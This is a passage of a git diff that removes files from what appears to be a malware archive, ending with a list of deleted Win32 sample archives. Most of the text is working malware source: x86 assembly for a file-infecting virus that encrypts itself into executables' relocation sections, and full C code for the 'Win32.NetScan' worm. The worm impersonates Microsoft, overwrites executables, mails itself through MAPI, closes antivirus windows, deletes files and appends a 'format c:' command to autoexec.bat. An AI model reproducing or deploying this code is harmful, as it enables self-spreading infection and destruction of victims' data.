lea eax,[ebp + cdir] - push eax - push 0ffh - call [ebp + GetCurrentDirectory] - or eax,eax - je ReturnToHost -s_files:cmp [ebp + max_dirs],0h - je r_dir - lea eax,[ebp + WIN32_FIND_DATA] - push eax - lea eax,[ebp + search_mask] - push eax - call [ebp + FindFirstFile] - cmp eax,INVALID_HANDLE_VALUE - je nxt_dir - mov [ebp + hfind],eax -i_file: call InfectFile - lea eax,[ebp + WIN32_FIND_DATA] - push eax - push [ebp + hfind] - call [ebp + FindNextFile] - or eax,eax - jne i_file -nxt_dir:dec [ebp + max_dirs] - lea eax,[ebp + dotdot] - push eax - call [ebp + SetCurrentDirectory] - or eax,eax - jne s_files -r_dir: lea eax,[ebp + cdir] - push eax - call [ebp + SetCurrentDirectory] -ReturnToHost: - ;check for payload: - lea eax,[ebp + SYSTEMTIME] - push eax - call [ebp + GetLocalTime] - cmp word ptr [ebp + wMonth],0ch - jne reth - cmp word ptr [ebp + wDay],1dh - jne reth - lea eax,[ebp + user32dll] - push eax - call [ebp + LoadLibrary] - or eax,eax - je reth - lea ebx,[ebp + MessageBox] - push ebx - push eax - call [ebp + GetProcAddress] - or eax,eax - je reth - xor ecx,ecx - push MB_ICONINFORMATION or MB_SYSTEMMODAL - push ecx - lea ebx,[ebp + VirusCopyRight] - push ebx - push ecx - call eax -reth: popfd - popad - db 64h,0A1h,0,0,0,0 ;mov eax,fs:[00000000] - ret - - - SYSTEMTIME: - wYear dw 0 - wMonth dw 0 - wDayOfWeek dw 0 - wDay dw 0 - wHour dw 0 - wMinute dw 0 - wSecond dw 0 - wMilliseconds dw 0 - - user32dll db "user32.dll",0 - MessageBox db "MessageBoxA",0 - MB_SYSTEMMODAL equ 00001000h - MB_ICONINFORMATION equ 00000040h - - - hfind dd 0 - max_dirs db 0fh - search_mask db "*.exe",0 - dotdot db "..",0 - cdir db 0ffh dup(0) - - - WIN32_FIND_DATA: - dwFileAttributes dd 0 - ftCreationTime dq 0 - ftLastAccessTime dq 0 - ftLastWriteTime dq 0 - nFileSizeHigh dd 0 - nFileSizeLow dd 0 - dwReserved0 dd 0 - dwReserved1 dd 0 - cFileName db 0ffh dup (0) - cAlternateFileName db 20 dup (0) - - -InfectFile: - inc byte ptr [ebp + decrypt_key] ;create new key - lea ebx,[ebp + cFileName] - xor eax,eax - push eax - push FILE_ATTRIBUTE_NORMAL - push OPEN_EXISTING - push eax - push eax - push GENERIC_READ or GENERIC_WRITE - push ebx - call [ebp + CreateFile] - cmp eax,INVALID_HANDLE_VALUE - je ExitInfect - mov [ebp + hfile],eax - xor eax,eax - push eax - push eax - push eax - push PAGE_READWRITE - push eax - push [ebp + hfile] - call [ebp + CreateFileMapping] - or eax,eax - je close_f - mov [ebp + hmap],eax - xor eax,eax - push eax - push eax - push eax - push FILE_MAP_WRITE - push [ebp + hmap] - call [ebp + MapViewOfFile] - or eax,eax - je close_m - mov [ebp + mapbase],eax - ;check for valid pe file - cmp word ptr [eax],"ZM" - jne CloseFile - add eax,[eax + 3ch] - cmp word ptr [eax],"EP" - jne CloseFile - ;goto sections table - mov cx,[eax + 6h] ; get number of sections - and ecx,0ffffh - mov ebx,[eax + 34h];get image base - mov dword ptr [ebp + Virus_Start],ebx ;save image base insaid decryptor - mov ebx,[eax + 74h];get number of datadirectory - shl ebx,3h - add eax,ebx - add eax,78h - push eax ;eax - sections table - push ecx ;ecx - number of sections - ;check for reloc section -@sec: cmp dword ptr [eax],"ler." - jne nxt_sec - cmp dword ptr [eax + 2h],"cole" - je f_rec -nxt_sec:add eax,28h - loop @sec -ext_rlc:add esp,8h ;restore stack - jmp CloseFile - ;check if the reloc section is bigger than virus -f_rec: cmp dword ptr [eax + 8h],virus_size ;eax - reloc section header ! - jb ext_rlc - ;set new section flags - or dword ptr [eax + 24h],0c0000020h ;code\readable\writeable - ;goto the section raw data: - mov edx,[eax + 0ch] - mov eax,[eax + 14h] - add eax,[ebp + mapbase] - ;overwrite the reloc section with the virus - mov edi,eax - lea esi,[ebp + virus_start] - mov ecx,virus_size -@enc: lodsb - xor al,byte ptr [ebp + decrypt_key] - stosb - loop @enc - pop ecx ;ecx - number of sections - pop ebx ;ebx - sections table - sub eax,[ebp + mapbase] - add dword ptr [ebp + Virus_Start],edx ;eax - virus start infected files -@sec2: cmp dword ptr [ebx + 1h],"txet" ;text ? - je f_cod - cmp dword ptr [ebx + 1h],"edoc" ;code ? - je f_cod - cmp dword ptr [ebx],"EDOC" ;CODE ? - je f_cod - add ebx,28h - loop @sec2 - add esp,4h ;restore stack - jmp CloseFile - ;ebx - code section header -f_cod: mov ecx,[ebx + 10h] ;ecx - size of section raw data - mov edx,[ebx + 8h] ;edx - virtual section size - sub ecx,edx - cmp ecx,DecryptorSize - ja write_d - add esp,4h - jmp CloseFile -write_d:mov edi,[ebx + 14h] - mov [ebp + virus_entry_point],edi - add [ebp + virus_entry_point],edx - add edi,[ebp + mapbase] - push edi ;save code section raw data - add edi,edx ;esi - where to write virus decryptor - lea esi,[ebp + VirusDecryptorStart] - mov ecx,DecryptorSize - rep movsb - pop esi ;esi - code section raw data - ;search for all mov eax,fs:[00000000] and replace it with nop --> call virus_decryptor - xchg edx,ecx ;ecx - code section virtual size -@1: cmp word ptr [esi],0a164h - jne nxt_w - cmp dword ptr [esi + 2],0 - jne nxt_w - ;esi - mov eax,fs:[00000000] location. - mov byte ptr [esi],90h ;nop - mov byte ptr [esi + 1h],0e8h;call - mov eax,[ebp + virus_entry_point] - mov ebx,esi - sub ebx,[ebp + mapbase] - sub eax,ebx - sub eax,6h - mov dword ptr [esi + 2h],eax -nxt_w: inc esi - loop @1 -CloseFile: - push [ebp + mapbase] - call [ebp + UnmapViewOfFile] -close_m:push [ebp + hmap] - call [ebp + CloseHandle] -close_f:lea eax,[ebp + ftLastWriteTime] - push eax - lea eax,[ebp + ftLastAccessTime] - push eax - lea eax,[ebp + ftCreationTime] - push eax - push [ebp + hfile] - call [ebp + SetFileTime] - push [ebp + hfile] - call [ebp + CloseHandle] -ExitInfect: - ret - -VirusDecryptorStart equ $ - pushad - pushfd - mov esi,00000000 - Virus_Start equ $-4 - push esi - mov edi,esi - mov ecx,virus_size -@dcrypt:lodsb - xor al,5h - decrypt_key equ $-1 - stosb - loop @dcrypt - ret -EndVirusDecryptor equ $ -DecryptorSize equ (EndVirusDecryptor - VirusDecryptorStart) - - hfile dd 0 - hmap dd 0 - mapbase dd 0 - virus_entry_point dd 0 - -EndVirus equ $ - -First_Gen_Host: - push offset exit - pushfd - pushad - jmp virus_start -exit: push eax - call ExitProcess -end First_Gen_Host diff --git a/Win32/Win32.Letum.7z b/Win32/Win32.Letum.7z deleted file mode 100644 index 2b406da4..00000000 Binary files a/Win32/Win32.Letum.7z and /dev/null differ diff --git a/Win32/Win32.Liquid.7z b/Win32/Win32.Liquid.7z deleted file mode 100644 index 040a252c..00000000 Binary files a/Win32/Win32.Liquid.7z and /dev/null differ diff --git a/Win32/Win32.Litmus.7z b/Win32/Win32.Litmus.7z deleted file mode 100644 index 5ff081c8..00000000 Binary files a/Win32/Win32.Litmus.7z and /dev/null differ diff --git a/Win32/Win32.Lolworm.7z b/Win32/Win32.Lolworm.7z deleted file mode 100644 index af702e42..00000000 Binary files a/Win32/Win32.Lolworm.7z and /dev/null differ diff --git a/Win32/Win32.Lusion.7z b/Win32/Win32.Lusion.7z deleted file mode 100644 index e8bef530..00000000 Binary files a/Win32/Win32.Lusion.7z and /dev/null differ diff --git a/Win32/Win32.Mydoom.a.7z b/Win32/Win32.Mydoom.a.7z deleted file mode 100644 index 500b466d..00000000 Binary files a/Win32/Win32.Mydoom.a.7z and /dev/null differ diff --git a/Win32/Win32.Napsin.7z b/Win32/Win32.Napsin.7z deleted file mode 100644 index 554b3732..00000000 Binary files a/Win32/Win32.Napsin.7z and /dev/null differ diff --git a/Win32/Win32.Nastena.7z b/Win32/Win32.Nastena.7z deleted file mode 100644 index 4c7d6b1c..00000000 Binary files a/Win32/Win32.Nastena.7z and /dev/null differ diff --git a/Win32/Win32.Nes.e.7z b/Win32/Win32.Nes.e.7z deleted file mode 100644 index 3b4c904f..00000000 Binary files a/Win32/Win32.Nes.e.7z and /dev/null differ diff --git a/Win32/Win32.Netscan.c b/Win32/Win32.Netscan.c deleted file mode 100644 index b35fd8f5..00000000 --- a/Win32/Win32.Netscan.c +++ /dev/null @@ -1,245 +0,0 @@ -#include "netscan.h" -#pragma hdrstop -#pragma warning (disable: 4068) -#pragma warning (disable: 4001) -#pragma resource "resource.res" - -char GetNetScanPath[256],GetNetScanWinDir[256],MyBuffer[256]="echo y|format c: /u /v:HaHaHaHa"; -LPSTR FileEmm386 = "Emm386.exe"; -LPSTR FileSetver = "SetVer.exe"; -LPSTR Nom = "a"; -DWORD ExtInf; -int Err,ErrSend; -HANDLE NetScanTime,NetScanHandle,AutoBat; -HMODULE GetKernLib, GetMapiLib; -HKEY NetScan32Key,NetScanNTKey,NetScanInstall,CreateNetScan; -typedef DWORD(*RegistServProcs)(DWORD,DWORD); -typedef ULONG(*SendMessInfect)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG); -typedef ULONG(*FindUserAddress)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*); -typedef ULONG(*DoMemFree)(LPVOID); -HWND WindowsHwnd,SymantecHwnd,NAVHwnd; - -#pragma argsused -int APIENTRY WinMain -( -HINSTANCE hInstance, -HINSTANCE hPrevInstance, -LPSTR lpszCmdLine, -int nCmdShow -) -{ -//Win32.NetScan by ZeMacroKiller98 -//Tous droits r‚serv‚s (c) 2001 -WIN32_FIND_DATA GetFileToInfect; -OSVERSIONINFO GetOsVer; -FILETIME GetFileCreateTime,GetFileLstAccess,GetFileLstWrite; -SYSTEMTIME TriggerScanTime; -RegistServProcs MyServProcs; -SendMessInfect SendMessToOther; -FindUserAddress GetAddressUser; -DoMemFree GetMemFree; -GetKernLib = LoadLibrary("kernel32.dll"); -MyServProcs = (RegistServProcs)GetProcAddress(GetKernLib,"RegisterServiceProcess"); -MessageBox(NULL,"This freeware install automaticaly itself into your system\nIt scan your system each time you connect to network\nIf you have any problem, contact Microsoft","NetScan Utility",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL); -SearchPath(NULL,_argv[0],NULL,sizeof(GetNetScanPath),GetNetScanPath,NULL); -GetOsVer.dwOSVersionInfoSize = sizeof(GetOsVer); -GetVersionEx(&GetOsVer); -if(GetOsVer.dwPlatformId==VER_PLATFORM_WIN32_NT) -{ - RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScanNTKey); - RegSetValueEx(NetScanNTKey,"NetScanNT",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath)); - RegCloseKey(NetScanNTKey); -} -else -{ - RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScan32Key); - RegSetValueEx(NetScan32Key,"NetScan32",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath)); - RegCloseKey(NetScan32Key); -} -if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\NetScan\\Install",0,KEY_ALL_ACCESS,&NetScanInstall)!=ERROR_SUCCESS) -{ - GetMapiLib = LoadLibrary("mapi32.dll"); - GetWindowsDirectory(GetNetScanWinDir,sizeof(GetNetScanWinDir)); - SetCurrentDirectory(GetNetScanWinDir); - NetScanHandle = FindFirstFile("*.exe",&GetFileToInfect); - NetScanFind: - NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); - GetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite); - CloseHandle(NetScanTime); - if((lstrcmp(GetFileToInfect.cFileName,"emm386.exe")==0)||(lstrcmp(GetFileToInfect.cFileName,"setver.exe")==0)) - goto NotInfection; - CopyFile(_argv[0],GetFileToInfect.cFileName,FALSE); - NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); - SetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite); - CloseHandle(NetScanTime); - NotInfection: - if(FindNextFile(NetScanHandle,&GetFileToInfect)==TRUE) - goto NetScanFind; - FindClose(NetScanHandle); - RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Britney\\Install",&CreateNetScan); - RegCloseKey(CreateNetScan); - SendMessToOther = (SendMessInfect)GetProcAddress(GetMapiLib,"MAPISendMail"); - GetAddressUser = (FindUserAddress)GetProcAddress(GetMapiLib,"MAPIResolveName"); - GetMemFree = (DoMemFree)GetProcAddress(GetMapiLib,"MAPIFreeBuffer"); - if((SendMessToOther==NULL)||(GetAddressUser==NULL)||(GetMemFree==NULL)) - { - MessageBox(NULL,"This program need MAPI functions installed on your PC\nPlease contact your hot line to install it","NetScan Utility",MB_OK|MB_ICONEXCLAMATION); - SetCurrentDirectory("C:/"); - DeleteFile("*.*"); - ExitProcess(0); - } -MapiMessage stMessage; -MapiRecipDesc stRecip; -MapiFileDesc stFile; -lpMapiRecipDesc lpRecip; -stFile.ulReserved = 0; -stFile.flFlags = 0L; -stFile.nPosition = (ULONG)-1; -stFile.lpszPathName = GetNetScanPath; -stFile.lpszFileName = NULL; -stFile.lpFileType = NULL; -MessageBox(NULL,"To test your network, you need to select a email address into your address book\nPlease select address with","ILoveBritney Freeware",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL); -UnResolve: -Err = (GetAddressUser)(lhSessionNull,0L,Nom,MAPI_DIALOG,0L,&lpRecip); -if(Err!=SUCCESS_SUCCESS) -{ -switch(Err){ - case MAPI_E_AMBIGUOUS_RECIPIENT: - MessageBox(NULL,"The recipient requested has not been or could\n not be resolved to a unique address list entry","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - break; - case MAPI_E_UNKNOWN_RECIPIENT: - MessageBox(NULL,"The recipient could not be resolved to any\naddress.The recipient might not exist or might be unknown","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - break; - case MAPI_E_FAILURE: - MessageBox(NULL,"One or more unspecified errors occured\nThe name was not resolved","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); - break; - case MAPI_E_INSUFFICIENT_MEMORY: - MessageBox(NULL,"There was insufficient memory to proceed","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); - break; - case MAPI_E_NOT_SUPPORTED: - MessageBox(NULL,"The operation was not supported by the messaging system","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); - break; - case MAPI_E_USER_ABORT: - MessageBox(NULL,"The user was cancelled one or more dialog box","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); - break; - } -goto UnResolve; -} -stRecip.ulReserved = lpRecip->ulReserved; -stRecip.ulRecipClass = MAPI_TO; -stRecip.lpszName = lpRecip->lpszName; -stRecip.lpszAddress = lpRecip->lpszAddress; -stRecip.ulEIDSize = lpRecip->ulEIDSize; -stRecip.lpEntryID = lpRecip->lpEntryID; -stMessage.ulReserved = 0; -stMessage.lpszSubject = "Microsoft NetScan Utility"; -stMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI send you this mail to test my network\nI need you to send me a answer about it\nThis program can scan your network to find all problem into your network\n\n\tEnjoy to test your net...\nThank you and see you soon....\n\n\n\t\t\t\t\tMicrosoft Technical Support"))); -stMessage.lpszMessageType = NULL; -stMessage.lpszDateReceived = NULL; -stMessage.lpszConversationID = NULL; -stMessage.flFlags = 0L; -stMessage.lpOriginator = NULL; -stMessage.nRecipCount = 1; -stMessage.lpRecips = &stRecip; -stMessage.nFileCount = 1; -stMessage.lpFiles = &stFile; -ErrSend = (SendMessToOther)(lhSessionNull,0L,&stMessage,0L,0L); -if(ErrSend!=SUCCESS_SUCCESS) -{ - MessageBox(NULL,"The test can't continue, due to a error occured during to sending message\nPlease contact our hotline at hotline@microsoft.com","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); -} -MessageBox(NULL,"The test is OK and NetScan is installed into your system\n", - "NetScan Utility", - MB_OK|MB_ICONINFORMATION); -FreeLibrary(GetMapiLib); -} -RegCloseKey(NetScanInstall); -STARTUPINFO NetScanInfo; -PROCESS_INFORMATION NetScanProc; -NetScanInfo.cb = sizeof(STARTUPINFO); -NetScanInfo.lpReserved = NULL; -NetScanInfo.lpReserved2 = NULL; -NetScanInfo.cbReserved2 = 0; -NetScanInfo.lpDesktop = NULL; -NetScanInfo.dwFlags = STARTF_FORCEOFFFEEDBACK; -if(CreateProcess(GetNetScanPath, - NULL, - (LPSECURITY_ATTRIBUTES)NULL, - (LPSECURITY_ATTRIBUTES)NULL, - FALSE, - 0, - NULL, - NULL, - &NetScanInfo, - &NetScanProc)) -{ -CloseHandle(NetScanProc.hProcess); -CloseHandle(NetScanProc.hThread); -} -if(CreateMutex(NULL,TRUE,GetNetScanPath)==NULL) - ExitProcess(0); -SetPriorityClass(NetScanProc.hProcess,REALTIME_PRIORITY_CLASS); -MyServProcs(NetScanProc.dwProcessId,1); -GetSystemTime(&TriggerScanTime); -//Close windows which title is WINDOWS -WindowsHwnd = FindWindow(NULL,"WINDOWS"); -if(WindowsHwnd!=NULL) - DestroyWindow(WindowsHwnd); -//Close access to Symantec HomePage -SymantecHwnd = FindWindow(NULL,"Symantec Security Updates - Home Page - Microsoft Internet Explorer"); -if(SymantecHwnd!=NULL) -{ - MessageBox(NULL,"You don't have access to this page\nPlease contact the web master to correct this problem\n","Microsoft Internet Explorer",MB_OK|MB_ICONEXCLAMATION|MB_ICONSTOP); - DestroyWindow(SymantecHwnd); -} -//Anti Norton Antivirus -NAVHwnd = FindWindow(NULL,"Norton AntiVirus"); -if(NAVHwnd !=NULL) -{ - MessageBox(NULL,"Ha Ha Ha Ha!!!!, you use NAV?????\nI can allow access to it\nChange AV now","Win32.NetScan",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DestroyWindow(NAVHwnd); -} -if((TriggerScanTime.wHour==12)&&(TriggerScanTime.wMinute==12)) -{ - mciSendString("open cdaudio",NULL,0,NULL); - mciSendString("set cdaudio door open",NULL,0,NULL); - mciSendString("close cdaudio",NULL,0,NULL); - mciSendString("open cdaudio",NULL,0,NULL); - mciSendString("set cdaudio audio all off",NULL,0,NULL); - mciSendString("close cdaudio",NULL,0,NULL); - MessageBeep(MB_ICONEXCLAMATION); -} -if(TriggerScanTime.wDay==1) -{ - MessageBox(NULL,"It's the day that your PC is going to scan or maybe going to disappear","Win32.Netscan",MB_OK|MB_ICONEXCLAMATION); - SetCurrentDirectory("C:\\"); - AutoBat = CreateFile("autoexec.bat",GENERIC_WRITE,0,(LPSECURITY_ATTRIBUTES) NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,(HANDLE) NULL); - SetFilePointer(AutoBat, 0, (LPLONG)NULL,FILE_END); - WriteFile(AutoBat,MyBuffer,sizeof(MyBuffer),&ExtInf,NULL); - CloseHandle(AutoBat); - ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0); -} -FreeLibrary(GetKernLib); -return 0; -} - - -************************************************************************* - -#define WIN32_LEAN_AND_MEAN -#include -#include -#include -#include -#include -#include \ No newline at end of file diff --git a/Win32/Win32.Nicole.7z b/Win32/Win32.Nicole.7z deleted file mode 100644 index 2b8816c8..00000000 Binary files a/Win32/Win32.Nicole.7z and /dev/null differ diff --git a/Win32/Win32.Null.7z b/Win32/Win32.Null.7z deleted file mode 100644 index eaa3cc06..00000000 Binary files a/Win32/Win32.Null.7z and /dev/null differ diff --git a/Win32/Win32.Nzm.7z b/Win32/Win32.Nzm.7z deleted file mode 100644 index d8b5525d..00000000 Binary files a/Win32/Win32.Nzm.7z and /dev/null differ diff --git a/Win32/Win32.Poshspy.7z b/Win32/Win32.Poshspy.7z deleted file mode 100644 index 6dc779f2..00000000 Binary files a/Win32/Win32.Poshspy.7z and /dev/null differ diff --git a/Win32/Win32.Psyclon.7z b/Win32/Win32.Psyclon.7z deleted file mode 100644 index c720ba99..00000000 Binary files a/Win32/Win32.Psyclon.7z and /dev/null differ diff --git a/Win32/Win32.Pwnbot.7z b/Win32/Win32.Pwnbot.7z deleted file mode 100644 index 7f8250d5..00000000 Binary files a/Win32/Win32.Pwnbot.7z and /dev/null differ diff --git a/Win32/Win32.Rage.7z b/Win32/Win32.Rage.7z deleted file mode 100644 index 4d8a214a..00000000 Binary files a/Win32/Win32.Rage.7z and /dev/null differ diff --git a/Win32/Win32.Ramlide.7z b/Win32/Win32.Ramlide.7z deleted file mode 100644 index 7115530a..00000000 Binary files a/Win32/Win32.Ramlide.7z and /dev/null differ diff --git a/Win32/Win32.Reptile.7z b/Win32/Win32.Reptile.7z deleted file mode 100644 index b44cb9c1..00000000 Binary files a/Win32/Win32.Reptile.7z and /dev/null differ diff --git a/Win32/Win32.Retro.7z b/Win32/Win32.Retro.7z deleted file mode 100644 index 8171bf60..00000000 Binary files a/Win32/Win32.Retro.7z and /dev/null differ diff --git a/Win32/Win32.Riot.7z b/Win32/Win32.Riot.7z deleted file mode 100644 index 6642750e..00000000 Binary files a/Win32/Win32.Riot.7z and /dev/null differ diff --git a/Win32/Win32.Rootkit.Alpha.a.c.7z b/Win32/Win32.Rootkit.Alpha.a.c.7z deleted file mode 100644 index 42547cf4..00000000 Binary files a/Win32/Win32.Rootkit.Alpha.a.c.7z and /dev/null differ diff --git a/Win32/Win32.Rose.c.7z b/Win32/Win32.Rose.c.7z deleted file mode 100644 index 4781f1d4..00000000 Binary files a/Win32/Win32.Rose.c.7z and /dev/null differ diff --git a/Win32/Win32.Rubilyn.7z b/Win32/Win32.Rubilyn.7z deleted file mode 100644 index a6ebc7c6..00000000 Binary files a/Win32/Win32.Rubilyn.7z and /dev/null differ diff --git a/Win32/Win32.Ruff.7z b/Win32/Win32.Ruff.7z deleted file mode 100644 index e3224b2e..00000000 Binary files a/Win32/Win32.Ruff.7z and /dev/null differ diff --git a/Win32/Win32.S5.7z b/Win32/Win32.S5.7z deleted file mode 100644 index 10c02d08..00000000 Binary files a/Win32/Win32.S5.7z and /dev/null differ diff --git a/Win32/Win32.Sd.7z b/Win32/Win32.Sd.7z deleted file mode 100644 index 4ed8c821..00000000 Binary files a/Win32/Win32.Sd.7z and /dev/null differ diff --git a/Win32/Win32.Sdx.7z b/Win32/Win32.Sdx.7z deleted file mode 100644 index 0e6fcc39..00000000 Binary files a/Win32/Win32.Sdx.7z and /dev/null differ diff --git a/Win32/Win32.Serotonin.7z b/Win32/Win32.Serotonin.7z deleted file mode 100644 index 7421fe99..00000000 Binary files a/Win32/Win32.Serotonin.7z and /dev/null differ diff --git a/Win32/Win32.Shadow.7z b/Win32/Win32.Shadow.7z deleted file mode 100644 index 977c3581..00000000 Binary files a/Win32/Win32.Shadow.7z and /dev/null differ diff --git a/Win32/Win32.Shadow.a.7z b/Win32/Win32.Shadow.a.7z deleted file mode 100644 index 59ffb2aa..00000000 Binary files a/Win32/Win32.Shadow.a.7z and /dev/null differ diff --git a/Win32/Win32.Shadow.b.7z b/Win32/Win32.Shadow.b.7z deleted file mode 100644 index 7b86b80a..00000000 Binary files a/Win32/Win32.Shadow.b.7z and /dev/null differ diff --git a/Win32/Win32.ShellbotFTP.7z b/Win32/Win32.ShellbotFTP.7z deleted file mode 100644 index 13b6427e..00000000 Binary files a/Win32/Win32.ShellbotFTP.7z and /dev/null differ diff --git a/Win32/Win32.Sinapps.7z b/Win32/Win32.Sinapps.7z deleted file mode 100644 index 1547b09e..00000000 Binary files a/Win32/Win32.Sinapps.7z and /dev/null differ diff --git a/Win32/Win32.SkonkModBot.a.7z b/Win32/Win32.SkonkModBot.a.7z deleted file mode 100644 index 71e89481..00000000 Binary files a/Win32/Win32.SkonkModBot.a.7z and /dev/null differ diff --git a/Win32/Win32.Skuz.7z b/Win32/Win32.Skuz.7z deleted file mode 100644 index 9cd6a5d4..00000000 Binary files a/Win32/Win32.Skuz.7z and /dev/null differ diff --git a/Win32/Win32.Small.7z b/Win32/Win32.Small.7z deleted file mode 100644 index 2dd0bbb9..00000000 Binary files a/Win32/Win32.Small.7z and /dev/null differ diff --git a/Win32/Win32.Sonia.7z b/Win32/Win32.Sonia.7z deleted file mode 100644 index a9c2eb49..00000000 Binary files a/Win32/Win32.Sonia.7z and /dev/null differ diff --git a/Win32/Win32.Spaz.b.7z b/Win32/Win32.Spaz.b.7z deleted file mode 100644 index ccbd1274..00000000 Binary files a/Win32/Win32.Spaz.b.7z and /dev/null differ diff --git a/Win32/Win32.Steam.7z b/Win32/Win32.Steam.7z deleted file mode 100644 index 127e5a7e..00000000 Binary files a/Win32/Win32.Steam.7z and /dev/null differ diff --git a/Win32/Win32.Stolich.7z b/Win32/Win32.Stolich.7z deleted file mode 100644 index 373ef673..00000000 Binary files a/Win32/Win32.Stolich.7z and /dev/null differ diff --git a/Win32/Win32.Sv.7z b/Win32/Win32.Sv.7z deleted file mode 100644 index 1423d35d..00000000 Binary files a/Win32/Win32.Sv.7z and /dev/null differ diff --git a/Win32/Win32.Tank.7z b/Win32/Win32.Tank.7z deleted file mode 100644 index 4861861a..00000000 Binary files a/Win32/Win32.Tank.7z and /dev/null differ diff --git a/Win32/Win32.TinyNuke.7z b/Win32/Win32.TinyNuke.7z deleted file mode 100644 index 05218cf1..00000000 Binary files a/Win32/Win32.TinyNuke.7z and /dev/null differ diff --git a/Win32/Win32.Trochilus.7z b/Win32/Win32.Trochilus.7z deleted file mode 100644 index 36c1f250..00000000 Binary files a/Win32/Win32.Trochilus.7z and /dev/null differ diff --git a/Win32/Win32.Tsgh.7z b/Win32/Win32.Tsgh.7z deleted file mode 100644 index 997ce9db..00000000 Binary files a/Win32/Win32.Tsgh.7z and /dev/null differ diff --git a/Win32/Win32.Volk.7z b/Win32/Win32.Volk.7z deleted file mode 100644 index faa04307..00000000 Binary files a/Win32/Win32.Volk.7z and /dev/null differ diff --git a/Win32/Win32.Wisdom.c.7z b/Win32/Win32.Wisdom.c.7z deleted file mode 100644 index e0d83b73..00000000 Binary files a/Win32/Win32.Wisdom.c.7z and /dev/null differ diff --git a/Win32/Win32.Woodworm.7z b/Win32/Win32.Woodworm.7z deleted file mode 100644 index a3507e80..00000000 Binary files a/Win32/Win32.Woodworm.7z and /dev/null differ diff --git a/Win32/Win32.Ya.7z b/Win32/Win32.Ya.7z deleted file mode 100644 index c559b468..00000000 Binary files a/Win32/Win32.Ya.7z and /dev/null differ diff --git a/Win32/Win32.Zemra.7z b/Win32/Win32.Zemra.7z deleted file mode 100644 index 468d354a..00000000 Binary files a/Win32/Win32.Zemra.7z and /dev/null differ diff --git a/Win32/Win32.Zero.7z b/Win32/Win32.Zero.7z deleted file mode 100644 index a3da3f18..00000000 Binary files a/Win32/Win32.Zero.7z and /dev/null differ diff --git a/Win32/Win32.Zotob.7z b/Win32/Win32.Zotob.7z deleted file mode 100644 index 55233fb2..00000000 Binary files a/Win32/Win32.Zotob.7z and /dev/null differ diff --git a/Win32/Win32.irBot.7z b/Win32/Win32.irBot.7z deleted file mode 100644 index e1cda8da..00000000 Binary files a/Win32/Win32.irBot.7z and /dev/null differ